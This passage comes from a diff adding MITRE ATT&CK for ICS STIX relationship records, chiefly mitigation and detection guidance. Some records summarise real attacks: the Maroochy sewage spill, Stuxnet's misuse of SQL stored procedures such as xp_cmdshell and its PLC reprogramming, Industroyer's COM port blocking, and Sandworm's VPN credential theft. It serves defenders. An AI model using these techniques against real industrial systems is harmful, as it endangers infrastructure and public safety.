"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--642cae89-bb5c-46f3-9fea-8d747b930c35", + "created": "2023-03-10T20:11:10.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T22:03:14.174Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's affected rivers.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--be532c78-daf5-431b-adae-ab11af395513", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:16:39.070Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) executes malicious SQL commands in the WinCC database server to propagate to remote systems. The malicious SQL commands include xp_cmdshell, sp_dumpdbilog, and sp_addextendedproc. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d5759cd-890e-4ec5-b92b-aba225d52960", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:40.767Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f", + "created": "2022-09-26T18:41:48.947Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:48.947Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f20d8eed-b517-4297-b32a-9a5e0845de9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.150Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c6520346-fe47-44ce-af75-d99004ac2977", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:17:59.179Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3aa69e19-f55f-4531-a26e-eb67d6ea24ee", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:11:14.662Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69146c10-d3d0-4f69-8164-9c21a1a4e10b", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:17:44.736Z", + "description": "Monitor ICS automation protocols for anomalies related to reading point or tag data, such as new assets using these functions, changes in volume or timing, or unusual information being queried. Many protocols provide multiple ways to achieve the same result (e.g., functions with/without an acknowledgment or functions that operate on a single point vs. multiple points). Monitor for changes in the functions used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7db9687b-7099-4cb6-a040-bc32fc549a81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.195Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e02565fe-65ff-4b70-8a8d-b0abf6d9a9f4", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:45:37.289Z", + "description": "Monitor authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours, including use of [Valid Accounts](https://attack.mitre.org/techniques/T0859).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f6b635b-1441-4ef0-9289-1ed6b9098d4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.240Z", + "relationship_type": "mitigates", + "description": "Reduce the range of RF communications to their intended operating range when possible. Propagation reduction methods may include (i) reducing transmission power on wireless signals, (ii) adjusting antenna gain to prevent extensions beyond organizational boundaries, and (iii) employing RF shielding techniques to block excessive signal propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)\n", + "source_ref": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "external_references": [ + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ae10e97a-90ac-498b-8601-01081dc4af8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.188Z", + "relationship_type": "mitigates", + "description": "Limit the accounts that may use remote services. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ca2fe75-9bb3-4af5-8fee-accd33d6d2ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Ensure remote commands that enable device shutdown are disabled if they are not necessary. Examples include DNP3's 0x0D function code or unnecessary device management functions.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:46:30.174Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--648c6649-5861-4b43-a7e5-a9665bafb576", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:17:15.157Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) uses the first COM port from the configuration file for the communication and the other two COM ports are opened to prevent other processes accessing them. This may block processes or operators from getting reporting messages from a device. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97641754-f215-4b8f-b0cd-0d3142053c76", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:48:56.024Z", + "description": "Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--590bdd67-31ef-4edd-b2ac-2bd1b98da19c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Consider removal or disabling of programs and features which may be used to run malicious scripts (e.g., scripting language IDEs, PowerShell, visual studio).\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bda03e8d-5e06-4470-b786-11b11c7c97c7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Deploy anti-virus on all systems that support external email.\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3c5bc8de-a7a4-4bda-a82f-8d149ec927f1", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:11:30.678Z", + "description": "Monitor operational process data for write commands for an excessive number of I/O points or manipulating a single value an excessive number of times. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--32dbed4e-4dbe-4872-a013-c96111ed102e", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + }, + { + "source_name": "ICS-CERT February 2016", + "description": "ICS-CERT 2016, February 25 Cyber-Attack Against Ukrainian Critical Infrastructure Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01" + }, + { + "source_name": "John Hultquist January 2016", + "description": "John Hultquist 2016, January 07 Sandworm Team and the Ukrainian Power Authority Attacks Retrieved. 2019/03/08 ", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "Zetter, Kim March 2016", + "description": "Zetter, Kim 2016, March 03 INSIDE THE CUNNING, UNPRECEDENTED HACK OF UKRAINE'S POWER GRID Retrieved. 2019/03/08 ", + "url": "https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:58.823Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) harvested VPN worker credentials and used them to remotely log into control system networks. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) (Citation: Zetter, Kim March 2016) (Citation: ICS-CERT February 2016) (Citation: John Hultquist January 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca64a927-f050-41b3-80d3-93d22cdef26a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.081Z", + "relationship_type": "mitigates", + "description": "Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3dc3aec5-0056-46e8-8073-a7e32d3d929d", + "created": "2022-09-30T15:28:37.614Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T15:28:37.614Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:27.767Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d406671b-4d22-4cd5-8568-d04b0b70b51c", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:49:29.157Z", + "description": "Monitor asset log which may provide information that an asset has been placed into Firmware Update Mode. Some assets may log firmware updates themselves without logging that the device has been placed into update mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2b62e4c0-9267-47bd-8f4d-0394b13fb566", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.127Z", + "relationship_type": "mitigates", + "description": "Once an adversary has access to a remote GUI they can abuse system features, such as required HMI functions.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5de6bf53-0a02-439b-a8d0-248fa9640a36", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Audit the integrity of PLC system and application code functionality, such as the manipulation of standard function blocks (e.g., Organizational Blocks) that manage the execution of application logic programs. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d4be020-4ab0-4f10-9a20-ae8a2886038f", + "created": "2022-09-27T18:40:11.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:12:41.739Z", + "description": "In the case of detecting collection from shared network drives monitor for unexpected and abnormal accesses to network shares. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 